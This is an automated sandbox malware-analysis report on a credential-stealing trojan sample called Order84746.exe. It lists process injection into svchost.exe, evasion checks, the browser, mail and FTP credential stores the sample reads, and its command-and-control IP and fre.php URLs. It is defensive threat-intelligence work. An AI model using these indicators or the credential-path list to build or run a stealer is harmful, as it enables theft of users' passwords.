Source: svchost.exe, 00000001.00000003.1677073300.00000000033F5000.00000004.00001000.00020000.00000000.sdmp  Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Order84746.exe  ReversingLabs: Detection: 26%
Source: unknown  Process created: C:\Users\user\Desktop\Order84746.exe "C:\Users\user\Desktop\Order84746.exe"
Source: C:\Users\user\Desktop\Order84746.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order84746.exe"
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Order84746.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\svchost.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: Binary string: wntdll.pdbUGP source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Order84746.exe, 00000000.00000003.1675657454.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1675962335.0000000003970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp
Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.2659065134.0000000000FA1000.00000020.00000001.01000000.00000005.sdmp

              Data Obfuscation

Source: Yara match  File source: 0.2.Order84746.exe.38a0000.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTR
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_009E5F50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_009E5F50
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0090C09E push esi; ret 0_2_0090C0A0
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0090C187 push edi; ret 0_2_0090C189
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0094C8BC push esi; ret 0_2_0094C8BE
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00906B05 push ecx; ret 0_2_00906B18
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0092B2B1 push FFFFFF8Bh; iretd 0_2_0092B2B3
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0090BDAA push edi; ret 0_2_0090BDAC
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0090BEC3 push esi; ret 0_2_0090BEC5
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
Source: initial sample  Static PE information: section name: UPX0
Source: initial sample  Static PE information: section name: UPX1
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_00FA3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,1_2_00FA3360
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00948111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00948111
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_008FEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008FEB42
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0090123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0090123A
Source: C:\Users\user\Desktop\Order84746.exe  Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe  Process information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Order84746.exe  API/Special instruction interceptor: Address: 11DBE6C
Source: Order84746.exe, 00000000.00000003.1666922397.0000000001032000.00000004.00000020.00020000.00000000.sdmp, Order84746.exe, 00000000.00000003.1667040845.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, Order84746.exe, 00000000.00000002.1677928248.00000000010A9000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: PROCMON.EXE#
Source: C:\Users\user\Desktop\Order84746.exe  Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-95294
Source: C:\Users\user\Desktop\Order84746.exe  API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe TID: 2816  Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 2816  Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe  Last function: Thread delayed
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00926CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00926CA9
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_009260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009260DD
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_009263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009263F9
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0092EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092EB60
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0092F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092F5FA
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_0092F56F FindFirstFileW,FindClose,0_2_0092F56F
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00931B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931B2F
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00931C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00931C8A
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00931F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00931F94
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_008FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008FDDC0
Source: C:\Windows\SysWOW64\svchost.exe  Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\svchost.exe  Thread delayed: delay time: 60000
Source: svchost.exe, 00000001.00000002.2659236687.0000000003600000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exe  Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0041289A LdrInitializeThunk,1_2_0041289A
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00936AAF BlockInput,0_2_00936AAF
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_008E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008E3D19
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_00913920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00913920
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_009E5F50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_009E5F50
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_011DC138 mov eax, dword ptr fs:[00000030h] 0_2_011DC138
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_011DC0D8 mov eax, dword ptr fs:[00000030h] 0_2_011DC0D8
Source: C:\Users\user\Desktop\Order84746.exe  Code function: 0_2_011DAAA8 mov eax, dword ptr fs:[00000030h] 0_2_011DAAA8
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h] 1_2_0040317B
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h] 1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h]1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h]1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3060 mov eax, dword ptr fs:[00000030h]1_2_00FA3060
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4410 mov eax, dword ptr fs:[00000030h]1_2_00FA4410
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4410 mov eax, dword ptr fs:[00000030h]1_2_00FA4410
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3540 mov eax, dword ptr fs:[00000030h]1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3540 mov eax, dword ptr fs:[00000030h]1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA3540 mov eax, dword ptr fs:[00000030h]1_2_00FA3540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA56A0 mov eax, dword ptr fs:[00000030h]1_2_00FA56A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA56A0 mov ecx, dword ptr fs:[00000030h]1_2_00FA56A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA4610 mov eax, dword ptr fs:[00000030h]1_2_00FA4610
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_0091A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0091A66C
              Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_00908189 SetUnhandledExceptionFilter,0_2_00908189
              Source: C:\Users\user\Desktop\Order84746.exeCode function: 0_2_009081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009081AC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA5848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00FA5848
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00FA33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,1_2_00FA33C0

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 94.156.177.41 80
Source: C:\Users\user\Desktop\Order84746.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Order84746.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 31CF008
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0091B106 LogonUserW, 0_2_0091B106
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_008E3D19
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0092411C SendInput,keybd_event, 0_2_0092411C
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009274BB mouse_event, 0_2_009274BB
Source: C:\Users\user\Desktop\Order84746.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order84746.exe"
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0091A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_0091A66C
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_009271FA
Source: Order84746.exe | Binary or memory string: Shell_TrayWnd
Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_009065C4 cpuid 0_2_009065C4
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0093091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW, 0_2_0093091D
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0095B340 GetUserNameW, 0_2_0095B340
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00911E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00911E8E
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_008FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008FDDC0
Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3300, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000001.00000002.2659257287.0000000003621000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\svchost.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\SysWOW64\svchost.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\SysWOW64\svchost.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\SysWOW64\svchost.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\SysWOW64\svchost.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\SysWOW64\svchost.exe | Code function: PopPassword 1_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe | Code function: SmtpPassword 1_2_0040D069
Source: Order84746.exe | Binary or memory string: WIN_81
Source: Order84746.exe | Binary or memory string: WIN_XP
Source: Order84746.exe, 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Order84746.exe | Binary or memory string: WIN_XPe
Source: Order84746.exe | Binary or memory string: WIN_VISTA
Source: Order84746.exe | Binary or memory string: WIN_7
Source: Order84746.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Order84746.exe.38a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Order84746.exe PID: 280, type: MEMORYSTR
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_00938C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00938C4F
Source: C:\Users\user\Desktop\Order84746.exe | Code function: 0_2_0093923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_0093923B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00FA6AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status, 1_2_00FA6AF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00FA6BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status, 1_2_00FA6BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00FA6B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status, 1_2_00FA6B60
MITRE ATT&CK Matrix (techniques listed per tactic; signature counts shown in the report are given in parentheses)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (2); Service Execution (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Valid Accounts (2); Windows Service (3); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Windows Service (3); Process Injection (312); Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (21); Software Packing (11); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (21); Access Token Manipulation (21); Process Injection (312)
Credential Access: OS Credential Dumping (2); Input Capture (21); Credentials in Registry (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (1); System Information Discovery (117); Security Software Discovery (241); Virtualization/Sandbox Evasion (21); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1); Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Data from Local System (2); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

Source | Detection | Scanner | Label | Link
Order84746.exe | 26% | ReversingLabs | Win32.Trojan.AutoitInject |
Order84746.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://94.156.177.41/davinci/five/fre.php | 100% | Avira URL Cloud | phishing |
 | 0% | Avira URL Cloud | safe |
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://94.156.177.41/davinci/five/fre.php | true | Avira URL Cloud: phishing | unknown
 | true | Avira URL Cloud: safe | unknown
http://kbfvzoboss.bid/alien/fre.php | false | | high
http://alphastand.win/alien/fre.php | false | | high
http://alphastand.trade/alien/fre.php | false | | high
http://alphastand.top/alien/fre.php | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.ibsensoftware.com/ | svchost.exe, svchost.exe, 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
94.156.177.41 | unknown | Bulgaria | 43561 | NET1-ASBG | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1565036
                        Start date and time:2024-11-29 07:36:06 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Order84746.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/4@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 54
                        • Number of non-executed functions: 300
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
